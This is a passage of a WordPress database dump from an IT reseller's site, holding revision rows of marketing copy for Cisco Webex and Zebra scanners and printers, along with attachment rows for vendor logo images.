04:02:00','',1619,'https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg',0,'attachment','image/jpeg',0),(1801,1,'2018-12-12 12:02:02','2018-12-12 04:02:02','','mobile computer and tablet','','inherit','closed','closed','','mobile-computer-and-tablet','','','2018-12-12 12:02:02','2018-12-12 04:02:02','',1619,'https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg',0,'attachment','image/jpeg',0),(1802,1,'2018-12-12 12:02:04','2018-12-12 04:02:04','','printer','','inherit','closed','closed','','printer','','','2018-12-12 12:02:04','2018-12-12 04:02:04','',1619,'https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg',0,'attachment','image/jpeg',0),(1799,1,'2018-12-12 12:00:25','2018-12-12 04:00:25','<h2>Cisco Webex</h2>\r\n<h3 class=\"wbx-product-hero-header\">Simply the Best Video Conferencing &amp; Online Meetings.</h3>\r\n<div class=\"wbx-product-hero-copy\">With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Meet face to face. Wherever you are.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Video conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Get on the same page.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Seeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Invite anyone or everyone.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Schedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Click or tap to join.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Easily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h3 class=\"title col-md-12 col-sm-12 col-xs-12 wbx-offerings-title\">Host events. Train your team. Support your customers.</h3>\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 wbx-offerings-body\">\r\n<div class=\"row\">\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webinars</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">With Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webcasting</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Host large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Online learning</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Lead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Remote support</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Cisco Webex Support provides efficient customer service with remote desktop control and live chat.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:00:25','2018-12-12 04:00:25','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1807,1,'2018-12-12 12:09:40','2018-12-12 04:09:40','<h2>ENHANCE PERFORMANCE WITH ENTERPRISE SCANNERS, MOBILE COMPUTERS, TABLETS AND PRINTERS.</h2>\r\nMore is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.\r\n<ul>\r\n 	<li><strong>MOBILE COMPUTERS AND TABLETS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1801\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg\" alt=\"\" width=\"346\" height=\"195\" />\r\n\r\nEach mobile computer comes with airtight security, steadfast durability and intelligent voice and data performance. With the Android operating system, youâ€™ll find theyâ€™re just as easy to use as your personal devices. This isn\'t consumer technology retrofit for business. Instead, these mobile computers are designed specifically for your enterprise and environment.\r\n<ul>\r\n 	<li><strong>BARCODE SCANNERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1800\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg\" alt=\"\" width=\"333\" height=\"187\" />\r\n\r\nFast. Accurate. Durable. Whether you need to capture data at a point of sale, patientâ€™s bedside, production line or warehouse, we have a scanner made for your environment and application.\r\n<ul>\r\n 	<li><strong>PRINTERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1802\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg\" alt=\"\" width=\"326\" height=\"183\" />\r\n\r\nNo matter what youâ€™re tracking or tagging, with barcodes or RFID, Zebra has the most advanced solutions. This legacy of innovation continues with best-of-breed desktop, industrial, card and mobile printers. And theyâ€™re embedded with software for remote management, easy integration and peak performance.','Zebra','','inherit','closed','closed','','1619-revision-v1','','','2018-12-12 12:09:40','2018-12-12 04:09:40','',1619,'https://bintara.com.my/blog/2018/12/12/1619-revision-v1/',0,'revision','',0),(1803,1,'2018-12-12 12:04:11','2018-12-12 04:04:11','<h2>ENHANCE PERFORMANCE WITH ENTERPRISE SCANNERS, MOBILE COMPUTERS, TABLETS AND PRINTERS.</h2>\r\nMore is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.\r\n<ul>\r\n 	<li><strong>MOBILE COMPUTERS AND TABLETS</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-1801\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg\" alt=\"\" width=\"293\" height=\"165\" />\r\n\r\nEach mobile computer comes with airtight security, steadfast durability and intelligent voice and data performance. With the Android operating system, youâ€™ll find theyâ€™re just as easy to use as your personal devices. This isn\'t consumer technology retrofit for business. Instead, these mobile computers are designed specifically for your enterprise and environment.\r\n<ul>\r\n 	<li><strong>BARCODE SCANNERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-1800\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg\" alt=\"\" width=\"267\" height=\"151\" />\r\n\r\nFast. Accurate. Durable. Whether you need to capture data at a point of sale, patientâ€™s bedside, production line or warehouse, we have a scanner made for your environment and application.\r\n<ul>\r\n 	<li><strong>PRINTERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-1802\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg\" alt=\"\" width=\"259\" height=\"146\" />\r\n\r\nNo matter what youâ€™re tracking or tagging, with barcodes or RFID, Zebra has the most advanced solutions. This legacy of innovation continues with best-of-breed desktop, industrial, card and mobile printers. And theyâ€™re embedded with software for remote management, easy integration and peak performance.','Zebra','','inherit','closed','closed','','1619-revision-v1','','','2018-12-12 12:04:11','2018-12-12 04:04:11','',1619,'https://bintara.com.my/blog/2018/12/12/1619-revision-v1/',0,'revision','',0),(1804,1,'2018-12-12 12:04:38','2018-12-12 04:04:38','<h2>Cisco Webex</h2>\r\n<h3 class=\"wbx-product-hero-header\">Simply the Best Video Conferencing &amp; Online Meetings.</h3>\r\n<div class=\"wbx-product-hero-copy\">With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Meet face to face. Wherever you are.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Video conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Get on the same page.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Seeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Invite anyone or everyone.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Schedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Click or tap to join.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Easily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<br>\r\n<br>\r\n<h3 class=\"title col-md-12 col-sm-12 col-xs-12 wbx-offerings-title\">Host events. Train your team. Support your customers.</h3>\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 wbx-offerings-body\">\r\n<div class=\"row\">\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webinars</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">With Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webcasting</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Host large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Online learning</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Lead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Remote support</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Cisco Webex Support provides efficient customer service with remote desktop control and live chat.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:04:38','2018-12-12 04:04:38','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1808,1,'2018-12-12 12:09:43','2018-12-12 04:09:43','<h2>CISCO WEBEX</h2>\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n&nbsp;\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n&nbsp;\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n&nbsp;\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n&nbsp;\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>Â WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>Â ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:09:43','2018-12-12 04:09:43','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1805,1,'2018-12-12 12:06:04','2018-12-12 04:06:04','<h2>Cisco Webex</h2>\r\n<h3 class=\"wbx-product-hero-header\">Simply the Best Video Conferencing &amp; Online Meetings.</h3>\r\n<div class=\"wbx-product-hero-copy\">With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Meet face to face. Wherever you are.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Video conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Get on the same page.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Seeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Invite anyone or everyone.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Schedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Click or tap to join.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Easily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div><br></div>\r\n<div><br></div>\r\n<div>\r\n<h3 class=\"title col-md-12 col-sm-12 col-xs-12 wbx-offerings-title\">Host events. Train your team. Support your customers.</h3>\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 wbx-offerings-body\">\r\n<div class=\"row\">\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webinars</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">With Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webcasting</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Host large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Online learning</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Lead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Remote support</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Cisco Webex Support provides efficient customer service with remote desktop control and live chat.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:06:04','2018-12-12 04:06:04','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1806,1,'2018-12-12 12:06:53','2018-12-12 04:06:53','<h2>Cisco Webex</h2>\r\n<h3 class=\"wbx-product-hero-header\">Simply the Best Video Conferencing &amp; Online Meetings.</h3>\r\n<div class=\"wbx-product-hero-copy\">With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Meet face to face. Wherever you are.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Video conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.</div>\r\n<div></div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Get on the same page.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Seeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.</div>\r\n<div></div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Invite anyone or everyone.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Schedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.</div>\r\n<div></div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h4 class=\"title wbx-text-block-header\"><strong>Click or tap to join.</strong></h4>\r\n<div class=\"wbx-text-block-body\">Easily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.</div>\r\n<div></div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<h3 class=\"title col-md-12 col-sm-12 col-xs-12 wbx-offerings-title\">Host events. Train your team. Support your customers.</h3>\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 wbx-offerings-body\">\r\n<div class=\"row\">\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webinars</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">With Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Webcasting</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Host large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Online learning</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Lead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 wbx-offerings-item\">\r\n<div class=\"row\">\r\n<h4 class=\"col-md-11 col-md-offset-1 col-sm-12 col-xs-12 wbx-offerings-item-title\">Remote support</h4>\r\n<div class=\"col-md-11 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-12 wbx-offerings-item-copy\">Cisco Webex Support provides efficient customer service with remote desktop control and live chat.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:06:53','2018-12-12 04:06:53','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1809,1,'2018-12-12 12:10:20','2018-12-12 04:10:20','<h2>CISCO WEBEX</h2>\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n&nbsp;\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n&nbsp;\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n&nbsp;\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n&nbsp;\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>Â WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>Â ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:10:20','2018-12-12 04:10:20','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1810,1,'2018-12-12 12:10:45','2018-12-12 04:10:45','<h2>ENHANCE PERFORMANCE WITH ENTERPRISE SCANNERS, MOBILE COMPUTERS, TABLETS AND PRINTERS</h2>\r\nMore is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.\r\n<ul>\r\n 	<li><strong>MOBILE COMPUTERS AND TABLETS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1801\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg\" alt=\"\" width=\"346\" height=\"195\" />\r\n\r\nEach mobile computer comes with airtight security, steadfast durability and intelligent voice and data performance. With the Android operating system, youâ€™ll find theyâ€™re just as easy to use as your personal devices. This isn\'t consumer technology retrofit for business. Instead, these mobile computers are designed specifically for your enterprise and environment.\r\n<ul>\r\n 	<li><strong>BARCODE SCANNERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1800\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg\" alt=\"\" width=\"333\" height=\"187\" />\r\n\r\nFast. Accurate. Durable. Whether you need to capture data at a point of sale, patientâ€™s bedside, production line or warehouse, we have a scanner made for your environment and application.\r\n<ul>\r\n 	<li><strong>PRINTERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1802\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg\" alt=\"\" width=\"326\" height=\"183\" />\r\n\r\nNo matter what youâ€™re tracking or tagging, with barcodes or RFID, Zebra has the most advanced solutions. This legacy of innovation continues with best-of-breed desktop, industrial, card and mobile printers. And theyâ€™re embedded with software for remote management, easy integration and peak performance.','Zebra','','inherit','closed','closed','','1619-revision-v1','','','2018-12-12 12:10:45','2018-12-12 04:10:45','',1619,'https://bintara.com.my/blog/2018/12/12/1619-revision-v1/',0,'revision','',0),(1813,1,'2018-12-12 12:14:24','2018-12-12 04:14:24','AnyDesk Logo','AnyDesk Logo','AnyDesk Logo','inherit','closed','closed','','anydesk-logo','','','2018-12-12 12:20:51','2018-12-12 04:20:51','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/AnyDesk-Logo.png',0,'attachment','image/png',0),(1814,1,'2018-12-12 12:14:26','2018-12-12 04:14:26','Apple Logo','Apple Logo','Apple Logo','inherit','closed','closed','','apple-logo','','','2018-12-12 12:23:20','2018-12-12 04:23:20','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Apple-Logo.png',0,'attachment','image/png',0),(1815,1,'2018-12-12 12:14:29','2018-12-12 04:14:29','Aruba','Aruba','Aruba','inherit','closed','closed','','aruba-2','','','2018-12-12 12:24:20','2018-12-12 04:24:20','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Aruba.png',0,'attachment','image/png',0),(1816,1,'2018-12-12 12:14:30','2018-12-12 04:14:30','Asus Logo','Asus Logo','Asus Logo','inherit','closed','closed','','asus-logo','','','2018-12-12 12:26:56','2018-12-12 04:26:56','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Asus-Logo.png',0,'attachment','image/png',0),(1817,1,'2018-12-12 12:14:32','2018-12-12 04:14:32','BenQ Logo','BenQ Logo','BenQ Logo','inherit','closed','closed','','benq-logo','','','2018-12-12 12:34:09','2018-12-12 04:34:09','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/BenQ-Logo.png',0,'attachment','image/png',0),(1818,1,'2018-12-12 12:14:34','2018-12-12 04:14:34','Cambium Logo','Cambium Logo','Cambium Logo','inherit','closed','closed','','cambium-logo','','','2018-12-12 12:16:55','2018-12-12 04:16:55','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Cambium-Logo.png',0,'attachment','image/png',0),(1819,1,'2018-12-12 12:14:36','2018-12-12 04:14:36','Canon Logo','Canon Logo','Canon Logo','inherit','closed','closed','','canon-logo','','','2018-12-12 12:37:04','2018-12-12 04:37:04','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Canon-Logo.png',0,'attachment','image/png',0),(1821,1,'2018-12-12 12:14:39','2018-12-12 04:14:39','D-Link Logo','D-Link Logo','D-Link Logo','inherit','closed','closed','','d-link-logo','','','2018-12-12 12:49:24','2018-12-12 